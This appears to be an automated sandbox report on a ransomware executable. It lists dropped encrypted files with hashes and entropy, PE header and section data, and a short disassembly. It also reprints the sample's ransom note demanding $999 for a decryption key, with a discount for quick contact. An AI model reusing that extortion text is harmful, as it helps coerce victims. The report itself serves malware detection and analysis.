          Preview:regf.....f......*...Ys.....(.#...<.5.^../wu..F70.m.....Efm>.[x.K.KIMU..:...n....A..>@...dq..J...'K..Q....oP<.J.((......;j...:..U..*<.}n..G.aA.^^.0T"('q.z.6....pO.j...1..O2.z..2.6:.4.....D..@......ig.tU. ...RO......E.k.....F.O.E. ...7n..8.O.E./5(....u...j.U.7r.{4....p.8....r....6..W..{]E.Y..v.@.1..y...qL...Ciu!=.F...GL..|sOj...._...k.b.}......L..G...y...D.}....~b.....(..w...:..y..+1.;A%[.'F.i.....e.\..x&......4.1.l.j..!3.@.....[....s..2......cu....@.y.-D....c....P.=..&w9|..[bqd.6...o.!V........s.-.......K.$.d..-...N...~.d.`...w....P66Y..*.;.|..$^@...N.T'>FP[..wz...|;r......T3ux....i........CU[.~.A.'.S..Qn..._BTQ.0.,mn......k%......"....V..N..G.E.h0.E.....9\z..(..V.N?l..E..(./Y.E70M[....!0b...?."4_{..~.=...a...JJ.O...%Y.Vx.:.C...K.......hW>..YI.A!...j.')..S/H..q$Od.O..$[.p.....Z.[..c.GjS...K...hz..*.B.o!....z#.G&V..8h...o.fR.I...A..]n.. .....Y..kW4.=a...f..!gv..&....m....%...=.[MI..2.L}.e.g.....8v:%.Nv......1.%".....r*.....O....u...D.g.S..@ ....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.97489158691189
          Encrypted:false
          SSDEEP:192:KK8K7dftgIVtVXCci81h/KvJntCKWwrALIFTxPAONFQZJb37b6z3kz0WgPvp0i:xLgcPTd1h/w33NFEJb37nTM9
          MD5:B4EE4B0F3872EA4203C86C47202FF030
          SHA1:4C10A38438176B889E30108FA86C07AEF29C3650
          SHA-256:BA08DEB64AB3A775B02B9475DF9F8F309C681F9D33405247886EC847FE3DA322
          SHA-512:9E5B1DB196E7E9F1627935FE7FAEE1972B3FAF2762D423D844AAC01E5BD4B272DB2A181FBC7518767A5EAA568C3F388F2232432AF3784794A70F18A46562DBB7
          Malicious:false
          Preview:regf....d.....M.9!w.</..|..0..:.}.,NC:.@bH..4.=R.?.R......O...8..........k..sG....n..0..7Q.>W..j...@z.>......P...F.P.V.TXvts......#.....d.'=l..Q.m.{..5h!<.MF...B....B....=.X.r<.Z........+y*N.....Xj2..D..cdMZ...F...r.l....[.......uZ..7.cL.(......?.....7f.M>..z..fd.....e)bh^.a.c65..b..r.w.Nr..t..X...(6...%..A.K*..Z..-G.P...r..o.H.#...........Z'.1..7$..*.h.S.....2..f.'...`.K..r....)..}..K..=.q/. *n-..r.d..Mg6.n.....8.=.t.;E...*..%.....yx.m...d!....Uu8..{.........3....J].N.....x..{^.}.....$f.&4....-.GE..6.A...{...".DK.h.k...R...]..T,....Np3B..../Tp.<.....<.i...R#..yg...1U...Ufj.x.k....7g,..[..o..]r._YE....@T..mb.D..6*.7...B.S.v.f2....h...s.0.gu...,..X.-.1.yf.>\]c.z..Y..V.H........0.....Y#'!B...}w......6R....N......W.P.....h....=.?.E..].x~..$>...w.n.hp.../..ze.SX..ldOw.<P..2.7~.=.g........6.e....3...<..B..,u@V.....?....*+xHV..#......u..x.Q*S.....E...<:x<03......>..8 ..p..3.\..y.b.....Kb...1..... ..l.....s...z4..yJ.$".C.1.......).y..z.>.[...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976082327923634
          Encrypted:false
          SSDEEP:192:fRIt+vOA/0rnfbhTN5S6rmWetV9F/kj/T2:f+t+v3/0PX5S6gbF/kj/T2
          MD5:7CBF1A8C6CCF45617DDF7187F1FE9BDC
          SHA1:3C43B5BA422278DAC5831A3A2F87B6B0FCA27EA5
          SHA-256:95D966CA7CD5197650FA033D21E093E1639616EBAF812DB5DCED429FF5C7584D
          SHA-512:F7A6B9354ABBC8D827A3EBFE8B564230DA357BA62598C51F671361DA0C27105C01C86EF0C72F10EE0E84C63A3AEB634B79780BA977931B3D12C764B1C8090006
          Malicious:false
          Preview:regf..`...}..:........y)..i.~k......~.F....../<..4.k.......p...3/Vr*...n.,,T.dIS.Yi..s>..D...+.t..z.h...2....y.7.<]m+..]4|"%...U.....'k....<..7./.. LAzo..h../.g/{..2^...z..XC.UwD.c....+....'.A......:....W..'pea.]....Olr.45w.Y.5.].L....."9..cX3.jYT.{p..f.../...T.@1.T...$.. ....I.!~.....uy_"......./.J.NJ..b.....@*Xik.........e....}...../u..M.R..2.X1....k..rc.w.9i..X...`3z.<..?..R...W&./...B......,.k/\...Y.{ ..L.....].V..........Rz&..=c.$.nF.4.2.....Z&.u....FH2..[...8r)._>2.Z...WG..*P.RB.....@...;.......>.B..D.~...M..........Hn..o/o._Fy.Q..Q....(YWN.]lJXz...#.nD=..h....W..........q*....h...Mb...g......!...r......B...K\.G]..M*P..J..w...TE Ic.f<.RD.....4.t.....B.u..J}.....~.Ru.....9...o..K....<.(.!N{.._..h......n.S........D......j..M..(.......b.hp.%.\.j.}G..%...A..=..WvH..Q.....Tay..k.M!Rf.y(.^(Mz.)hv~33.P..../"3.7.)..f...g....=..m\..q.O.....A.F0._t.v.."v..@..zV.Q...p..B..z.~.&=.....:....qS..b[^.DG0.M.+...T.^...F.....0|._..N.J^+L..)[=K.6.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976752723915352
          Encrypted:false
          SSDEEP:192:bfyPU9ryLuaMwMDn9X1/TmwqKjHUwE0ZogZaPDn5f9aL:W86uaMZb9X17LoNSoNrh9O
          MD5:957FED41EFBCDA8E42E5254D07372BB4
          SHA1:05A9EC7D69F1B5F1C90D9B034DBDF7CD9271A1FF
          SHA-256:18312B04D5ED2C69C5B6BDA6CBC484EE6E2060E3E0EFC2DC99E7C5E962EDDA9F
          SHA-512:3A85F5187C445F9668B19D1D902FF02142D839560C023FA1D9BF40740DC498CA54441C9E8E6B14E2A587AAD9B79FE21A962D41318E8BC7F8E214D17295E452D7
          Malicious:false
          Preview:regf..........T....^.E.59{t..Mh...oh..;=.E.}.YQH}.x}.....>.....b.Z..&.Z^E.GS%..\.U.@.@,t.D..&..4.A5.p...j9.Z..X3.=.KG[I.u%.1P.8|........Pz@..l.,d f...y.X.9.'v.?k....b.B..Em..v..o..4.Y.....!T.,.AJ..U.r.......*.D..\0.=i...[..`....;....E7..%.!2z..o.......|.>.nF`[i*..s.J!~..l`9*.../..u...XQ..+x.y...5.....s.mT.\9...2.......T...."B.2..w..J!.....UN....)^Z..q4}8......;.3....@AL...Y.m..r..z..W...1:..L.#.'..1...e..b.Ks.R."..gr.97...Xi.&.Z....|........+Pk.X.Y....-......O,........q.f.N.e.w.uV\.'?....n..'.f.....W.nd.}V.i..........X..q.....2LW."...z.C.p.P..3....S...V.z.x.Q..#._i..p.CYH.L-D\.:3....O..Q.-...D{.....n.P.a.6...Jp...25'.HQ..L.;..$.v.3.....@...;6h.u*....xE...X..}...m.E.2qqx...}@7.c.{-.O9...D..X2....$...._f~&....m._.O;..e.....+`]|<.$kv..~...cTf8....!.l...5..5.!.$;e...>.-..Y....#;B.. ...S...K....]...S.9..,.X...t&..X.Z..&."k.^....V.x..[8K..3.A.<..l...T.%..b....LkR.|....DM.c<.bJ5.1.^..W5j4.=.S~.k.W.;....6..xCY.C..=..UL-..K~C^.;.... .X....&O;./.x...am....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.979890559495724
          Encrypted:false
          SSDEEP:192:hzwPUBqF5nn3ku1ZPMDRUhz1ML8PrGx2PN8nzzPzyXTZpMOwhy:hzwPUBkn3kufjxGANSyXPXyy
          MD5:C5F4441B106F310CDCC103E6DE8A8CA7
          SHA1:8531416D9BFA7549A299F782519AE8DAB973BB9E
          SHA-256:1E32C1DBB60155B38E7D546E0530C81386F7EEE1D9D461AAB8256F5C42B64E9F
          SHA-512:D9126F5DE5CF98B5FA4CCA5AD2139D6E29D9B14FEC1C85CD6561D05C7F0D720C4E006BDF8FADF9FBB1044563527A24BE6661C4BF2464289F71D3F02EF2DE9038
          Malicious:false
          Preview:regf.?..!.K }...gW......+...~(_.<...c..x....V.v.t.E.@.@...`...p...GK....?..Z..........6:..... W~.8....#..A'f..U..o......u.G8..UJ....2Ul.EXs_..|H..?f*B.s....ia.=..G......|.._....o<...%....qP...R{Y...S..<.>..eL......&..L&.t...tL ....;..Pd.Y.(:.`Q.....a..=...~pT3t.jAJ^1.....}.M.6y..s1R/./%..K[.4..d.I...B..p.\._.7.....ncF^.=..;=..-M.a..Boc_..M.S........:....{..!......Mb.)...,..-..Sc@.....r....~?.%...~..Uo......P..o....7v..P...'...D.G.Sl............O.....:..%.RD..P..t..x6...:9g.~4xn`..z.....O.....n#(.X>(...JY..2#....-....A....@A."!....b........89...9..h.'..@.+.t..B........D.7.f:.....u..c../.. sUF.hQ.a.S.do%..ua..oG........@.bR.....G;...T.g.y...%.x}...<pw.e.B<.l.S........hU.....c..wj..3 C..u.N.K..Iaj......>Gw....Ib........X..i5.{...tp......&(..S.~..w.8......2{.yv....j.'/Nd.;.[T.}..=.^6.!.L&.....n....A.g. .....P.Fdc..l.=H$......"<\../<.A..L.A.v.. ..I;eRnN.)...7A....K.We.}rQ.h#,.{.9(..B0*.ho...-....b5o.|.z....;z!}|......*.....`..v.+f..F..2....nw...$N...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977201833590514
          Encrypted:false
          SSDEEP:192:512ltrXwrYjGH5akXEE99q+ARy3qvqzZn4RlCJcB/3ypb:512PrEvlt3qCzZn43NE
          MD5:8BA436524A25CD0EC6108B4A910D08BE
          SHA1:C50C0AB8E15273E412666CCCD435FB047CA08139
          SHA-256:10F47088B72E3B664209973FC9DF62CB3A7F1F4CFB847CD810053525B7936203
          SHA-512:1BF56375D220A37787F4B29C88D983135F29D0A98FF3B12076B6739897776CD155830D17C8AAA2D05C78C7C488CAA6CC64527DCF35775CC0BC70C425DAB26D18
          Malicious:false
          Preview:regf......K.uU.1W.).@9...*.a..3.]P.q....u..#S\.G..F..d..W..@.8{..5.. .....A...2..b.A7....\..uKK.?l.Z..h.@.XN.F.U...0.%NQ:...$....z.2.."..*.......tJ..UN.5]..|6..zf.{....y....z&.BR.a,efS.n...5.R..(i......p..[.v..E?.....8........N8N.+..C..`..U.....:^Q<J..t..Z...et.V...B...FZ.9p8..&Q...h.._*..5..2..p.'+...z.j.._.d......u]%} ..r..%.0Cq.OG....\2....F....A2.{._Q{,.F...d|.2..88F....d..GX.]..T.*J.....]..G`.&........@%..Is...@~......~.G.c.#.t"....0......`....@..=...4.6NO...-..VH.$1......}...|..........&. ...D.Qa.d...`.,..eHI:.YV...uk...u.V&..e...k...Ym..z2...VC.i`..N.......L...\.IT.i..g.....+.'.a9.GsP-.w.......>..siW........+.-...rpf&e.....~.?..S/@k..%.{7W...ch.^.m.....xA#M`K.H....&.]..#.1....;..........w..`..B(,.J..Ul7X..>3.Gi...>v.'Q...=W......./v...i..,...:...!.=...9cD....#...6}#..]Zl.....V..t...7..7.t.......!..H....J'r..g.V9.1...,.`T)..pO.^....j.z.6D-.m...J....V..m1.Y.or.qQ..A1../.6?.Vf.....n.k...'....>g....G.M...|..[o.P....M.0.#.b..q.c]
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):107523
          Entropy (8bit):7.997945989443442
          Encrypted:true
          SSDEEP:3072:k9RsUzHk/WTg+cZk/Y3NEYImsU0hBn/q936C:csUzzg+1/SNXIhBnigC
          MD5:1F792197AEC16E9F8E1F0DB38A1D618A
          SHA1:32AD7B87046314E823763807F2200DB979610A1C
          SHA-256:366DB62D6C2910DFF4AB07B79FE7017A75DD1CFF180943F8B832FF3E2FEBE53F
          SHA-512:BA9F0ED9D80318E9E3394D0E1A1C6DFE57B436A8B3F72767E60337FA22B2C63DFE1D4AAB0463896EE18035A3E6ACEA6561B9CB09BFDBABF1AED2F967D2D8646C
          Malicious:true
          Preview:<!docI.....Ek_Z.m...t....4....}..s......P.T.C.f...zo.f..k..A.C`=..-..Z...Q....CD..:.y...p._..ZG.....x.:.0S.?....lz]..V8n^?Ng.(L..*...l.i.T..?..S..X}P.W.X....Q.;*...Ny\"....I...p.aj\g^..D.....x4..{.3....nx..xv......#y....{......./{.s.\V.M..qa..4`>.^I.^..G4.M..>.UL...0*.......O7..W..U!.W....K.......<}s.@A....b.L.a.#..c..*.....9...m.P.M./.[;b.<......$..=.C..q".7..(VNx.....H\r.s....1A...Fb.....G.zJ..O3..[P.J.(.,.S.Cy...4../c...Js....tyw-a..1..k......&B2.Y. . .!J...0.Tz)|...H}P....B.q.I]..TJPM....7.<....d.....G...U...Q.'..)|...o.>...5..>E..N..{.j'...&....-...B+x.-.........*3$u..@..0.f.....}m.I..ZI.u.42<..:.t..c.{.X..{./%...*.A? y..w.O...`.&.v1.\...7t.@..<.O......-.......>U.4....v...Rst..,3. "H...nN.......Y.V.)g.?.V..o[...{........;.dQy...xqah.........O..U.io.u.6.D.......c..K......`.....}.E...v..R.m.'.S.'..'._...E.~.....N!.+.]).9.`..(d.G...+.4.....f...P.^...K|Qo....C:..=`.....E...l..T....&.qz.5....G2#%..f$.......ktX..K@m.lx.&1.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978378234936866
          Encrypted:false
          SSDEEP:192:07VVmaUcMjruQDl89f5xpe08AyqKNDchkteTn9LoNLLuXP5qokknuE9NA:07CTtjNDGn6gSQhkt8KLa/5q9OI
          MD5:54E6734A3ECB7206BA3A9064C42D06FE
          SHA1:CFFE1A0D7E2ECBD55A34529A9B584613D97AB8A9
          SHA-256:CA18DB7688DD279B751BADD223A34A67BE7A0A990242D1AF68E25785D9948E4B
          SHA-512:281D81BFBC2FD4DABAAF1679027D98E7675D461212259961DA3063CA3ECE713F55BD0F08701D8F7D43D905B8D84F9C2B44B50C30A5B97FB550E38D2F799D6088
          Malicious:false
          Preview:regf.@.\~.s.2-...M....!..;#..f..z.....|K...*...$.$......?.....F...k....(.y...c.~U.P.(...z?T.Z..6.,..*=.M.Z4.5....-..T...i.w$r...C...GWe>..&..yd9.dg.5r.O..q..>.D}.3.X#..%...........C.. ....gX.....^..VU$..c*...Yf5..t!.....Ib.>:....3Y>.k..DLj..6...-.{H..Rh..y..C...aG.m..|.<%...]...j.._..X...!7g9i].2w.e.. ....D.d.....:.<r~:qG6 .b..V.9......%..s.3>HB...n.]'.....(.Z....?.F(>.S.~....2.GC..u..&`.#.._~.......Q.wU....i...mX...-.j>V.w..x.....e..%...AY.. .`..B......U....M..R...R..I./..1.N..1...nMIj...]_<....-....%.v..j...O...1.....k..$...B...r.*.u...d.J....=y.eJ..kO......y....J..L...s...59=..6........O.p&...O(.p,.....mr.L..?.@H.T.C.>#7.[..rw..F..2.$.0..i.|K..J%.L|7b.ls...RU.....G.J..2A._Q.l4......n.......wW.&.SU...p4.b. 9.".z.K.....>M..L(:.....li.n.0..j......v..Cq...D?/2&.}........kdkkd>..;....Yp.)V.E......x...=..'......Yk..2.#..../~............<...L..Q.@......<....`>P}..R....ox..0..~.Fk.$....~I~.#.^.......1..".a.%so(t#.......p|.G...-7..p.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.980367436239423
          Encrypted:false
          SSDEEP:192:LG3pAIdVXcUh0fNlDXXhqzcqUP/opjkpnk/sZJyVYSxGJMvJre32M3N9+sz8jYTf:LhIddcrJXXxohkcsZJyzUMBre3n9+sAG
          MD5:45C9DB5D4F700725B42DB62605AE0288
          SHA1:390274D024F9ADA91376B7AC24E48281F06D910B
          SHA-256:3404F0C478AA017345265AD752012A6FBBFA72DD97D57E1928F884040A26F59D
          SHA-512:BAA0E350096105522F0C3013571C54695B282E20EAB7E2429A273433DFEAAD9C92436A7E93FA0B1D6591B9399F44018708869329AC87045E8531BF1FD38BFE35
          Malicious:false
          Preview:regf.S]...e.fBQ.........0.r...ZF./>SNr......U]...!...;.........y.5.).^X......1.pE..I#:..."...X\.P..,..}{Hq..u....G?..p.Z...Q...WA.K...k.....@.<H.........(.5...2.<.wj..S[5.mK...zb...<.P.7..?.%../....3...mfw..]Z3'....U..a$.b..5"...#..-.Q._'>......k{.B.)t..B;"..H.7-.ym..-..3.b....TM.('..5.+He.uG..&..P*..4.?}K...F..mn.%..y.....s...s.y5.SR%0.`y...u$q.f....L....(.+..?.F.t.Cg.v.P.gL..O..y.P.....U<..k..u.....@.HS;..t.B.2os..v.F..YC.2..;S.%.6...I.?..M.D...F..._M.6..Gc=....Jj.(c.-..w5~.Z....-.T.0...{."]...&h......s...i....>..E0.k...g..<...qw,aZ.#b"..d.].|.M.J..../h.6.W_'.}f..w...j.....&t5 $..W*......Im.4..._.....{#.O. [.. O.xf..}.*7........g.P{m.0....._.x7....Z...,TOK..AQq".V?......y....D...w.$.M.&..2Y..u..U..R.b|.....R....B..=....v.0b.....R....H.?hg........QG...SLS.7.K....iEUU.j...k.o.J4...#.]5.=O&_.A.....S.Y.me...(.....w..{.........Y._}..a?52....hV1..c*eRT...GgWi.t....,.s1..J.....D.b...F;.BR...S....."..|v...........hm..\.}..;.3.N]y.K,Nr%..4.w..q.*
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.981520978753238
          Encrypted:false
          SSDEEP:192:WIpC7DSXrLwXf9Zobmx+xFvrWCIpOZmx//Af/uG7pRMOLgjk:Wj7WyfPwm9WZmx/4fB1RVLgI
          MD5:6DB4905FEE6C72E0FEF75F1C4AAE77AA
          SHA1:8375F971D3EE6F678D5A4761C736E3FC96107787
          SHA-256:AB28003EC596AC9C92B792F4E8E8F42A40ABFF648A3B9A5D41C6DA9884B3E610
          SHA-512:350378C5A1BE562A2C9A6790FFC0341B648DF36AA88DA4591A3D33BC7C53BA71A19000CE7991B31E1F04EEA9E629594C20CFBDFBA077D0386443BBE66A4375AE
          Malicious:false
          Preview:regf.#.%..KQ...of.t...#...<.T.m..S.....$.'G.....,...J...z..N.*<@..0.D.;..t.A..!.!.R...7....J..G../....6..j.\U....*j.5T....;...X...b|=...).....x....%~..eQW;..+_.A.<+.H....S...R...|..v...o.=..P.4..y.C.q..(y=r.H...p..7.T..R..$S.B..J.....KK.\..).X<*.x).b&S.....*_Lb.<......W.{.z.....nu.....:.l_]]_...i;......,wV...{...E..*L.R..B...c...p.0.n......E:.;&.$......o..F.W.T~...[.{.......1x..K.I.=...X..8..H.vg...MPe~y..y.j.fa.yL.DW.&..v.IFb.J.....a...\....EP..9.....9|.....]w/<Q.......q.03`AU..J..F..!....=...../g.9Nb......9..y.E....Z.o.C..I...N...fE.S#..Xo....ai.74....5.p..4:Y..F....Xab..f..S..A.......A...HY.A...?.9.P)98c5)|=.d..2...jO..%Z............S.L.^.^0.]z..3.-V...~.;..5(U....(..a.....[.+....z.2).g.[#..\...H@i.~..o..jB.c...P(.!.6........eV...U..R.....wT...:...Y.`.....$.#.g.0..]3.Q9.r...u.......9...n..............Y.}...Q.]T.;U.&..~<...!J.......V..P...HR.R>...-.^._..=....3R...L.&.-.?a.P.\../m....*C.....5}..jT..6i..[.Jz."zQH>#4.#.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):892
          Entropy (8bit):7.746135269581158
          Encrypted:false
          SSDEEP:24:YjyTUqgsLxqvVio93LI92BDtijxKFySeCheJiTkbD:Y+Thgf97AktTsryiD
          MD5:F67C0B29CFF0F748D30B786CBEC49953
          SHA1:93F2670A4AFD25BDDE8A87B8DA09F1D1FF80AF03
          SHA-256:926A1A21D499803FCCA864835EFAFA31F4D4EF2FDBBC331DDEE994CAF5C81D43
          SHA-512:645C6466DA75DCB71D13B7AED378FFEDC7FF0F939A31A868E5486E15586DAA800042AB83672598045DB2C21A409BF0851B467D42E576547847D60C0637C44134
          Malicious:false
          Preview:{"pubgN3.'......<.ZU....{.n.u. ..W.E*Mb.N...K.}....w`.w..xD.V8.8. ..MV....Aog...7.+.M.P.Y.N.m....,.'xJ0.1xn%.H.........c..........Z...F})....d.....r..wT.Z~.8.g.Z...>.,.'.$e.U...Z...C.A..`..9....l..<)tR..m.gN.>EQ.=iCVO..XU.|Y........o....f..:..bv.......R..2..c..#._.y...).=:..'D...........`hn:.F..oj.v..9.iD.X........o....4z...-{..^.r..=:8.O.{.8._.\..\5L....P$....<...2I.n...8C...w.[.yv.C.q.<g......4.........wIs`.i.A......j@NKTE.]..J.s.f..m.z........rW..&../.Y..d...@........c.............(.Z.ID..:.t'.R..:b.l..c.......Q...(.f...QURr....j/..@.g.eY..].UY.j......b\J8N.f....;TwS..d..U...sc.8.[...Z. .......{A.Tt....~..O.U.]....~..s...Dw..d......w......R.V.....E...U.....*&.......Z@.....)&j..9..p.Ko....`R.B.{...e%J......E#O...P'....o..U.uA..f0[J..?<..C...Nc.F.......'.dhJqj..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1381
          Entropy (8bit):4.907572658669038
          Encrypted:false
          SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3Rg:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/k9
          MD5:7AAC7E860D0763D7658CF3E98C4A6B2A
          SHA1:9296CEDD825F5EE3920DE92CDD4837900C451AFC
          SHA-256:22D5064ED6775D4DE4B6F19E3981B49B24CED60ABEAEC096AAD34C8835396261
          SHA-512:D436617761B8630AFB48325E292FB3565F7291F7448A3AA769429DAD8858BFFB3C7040ED480F18ABDF6E990D86D565DC84C43719506CC3461993C72C78B5F957
          Malicious:true
          Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.478589132226232
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:file.exe
          File size:795'648 bytes
          MD5:006edf0ac466164ddc9e0ac56474fe0a
          SHA1:ee9f512713af63759f11279090d2c8004762735b
          SHA256:d343ea857cdf97aa0ccfd14970425c6888bd216d36ad7f6255a044bed36a4b2a
          SHA512:43305369fea2dad52d51bc9d5947a2f7e78d33baadd07093c250b9eb1fd3762c511033bbfae2b8d6eb52254306d137e29cd15e0b30b0f6d44a9d4f3d12b8b808
          SSDEEP:24576:aG18MH/r+RAIFqLN7/uW/Nau09jMxrc5N:3aMD+RANBKIJ09j
          TLSH:E505E0D263976856DF264B328F2AD594391EBF425F7B26BE71443A2F05B39F08923310
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................F......................................Rich....................PE..L......e...........
          Icon Hash:738733b18ba383cc
          Entrypoint:0x40177e
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x650E920A [Sat Sep 23 07:21:46 2023 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:0
          File Version Major:5
          File Version Minor:0
          Subsystem Version Major:5
          Subsystem Version Minor:0
          Import Hash:3f14e3b7aefb4fc1c763f1c17e499d8c
          Instruction
          call 00007F9F5D15C70Fh
          jmp 00007F9F5D1590EDh
          mov edi, edi
          push ebp
          mov ebp, esp
          sub esp, 00000328h
          mov dword ptr [004A8558h], eax
          mov dword ptr [004A8554h], ecx
          mov dword ptr [004A8550h], edx
          mov dword ptr [004A854Ch], ebx
          mov dword ptr [004A8548h], esi
          mov dword ptr [004A8544h], edi
          mov word ptr [004A8570h], ss
          mov word ptr [004A8564h], cs
          mov word ptr [004A8540h], ds
          mov word ptr [004A853Ch], es
          mov word ptr [004A8538h], fs
          mov word ptr [004A8534h], gs
          pushfd
          pop dword ptr [004A8568h]
          mov eax, dword ptr [ebp+00h]
          mov dword ptr [004A855Ch], eax
          mov eax, dword ptr [ebp+04h]
          mov dword ptr [004A8560h], eax
          lea eax, dword ptr [ebp+08h]
          mov dword ptr [004A856Ch], eax
          mov eax, dword ptr [ebp-00000320h]
          mov dword ptr [004A84A8h], 00010001h
          mov eax, dword ptr [004A8560h]
          mov dword ptr [004A845Ch], eax
          mov dword ptr [004A8450h], C0000409h
          mov dword ptr [004A8454h], 00000001h
          mov eax, dword ptr [004A7004h]
          mov dword ptr [ebp-00000328h], eax
          mov eax, dword ptr [004A7008h]
          mov dword ptr [ebp-00000324h], eax
          call dword ptr [000000B8h]
          Programming Language:
          • [C++] VS2008 build 21022
          • [ASM] VS2008 build 21022
          • [ C ] VS2008 build 21022
          • [IMP] VS2005 build 50727
          • [RES] VS2008 build 21022
          • [LNK] VS2008 build 21022
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xa66140x3c.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1a3d8.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa63000x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0xa50000x168.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xa3fc90xa4000f53f5076b3fd9f435feec91fc63da8a3False0.910254501714939data7.737435826945235IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0xa50000x1e4c0x20004603b29921c9eab049e6c4dda159d570False0.3455810546875COM executable for DOS5.396404714679885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0xa70000x10e9c0x1c00bb0366301d228156ed1af9fddf56ba73False0.12262834821428571data1.3675137366174874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0xb80000x1a3d80x1a400c094605206dfcc81fecf0d90ecd566bcFalse0.39109933035714284data4.916967378353403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_CURSOR0xcb0400x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
          RT_CURSOR0xcb1700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
          RT_CURSOR0xcd7400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
          RT_CURSOR0xce6000x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
          RT_CURSOR0xce7300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
          RT_ICON0xb88500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5962153518123667
          RT_ICON0xb96f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6714801444043321
          RT_ICON0xb9fa00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7258064516129032
          RT_ICON0xba6680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7651734104046243
          RT_ICON0xbabd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5569502074688797
          RT_ICON0xbd1780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6815196998123827
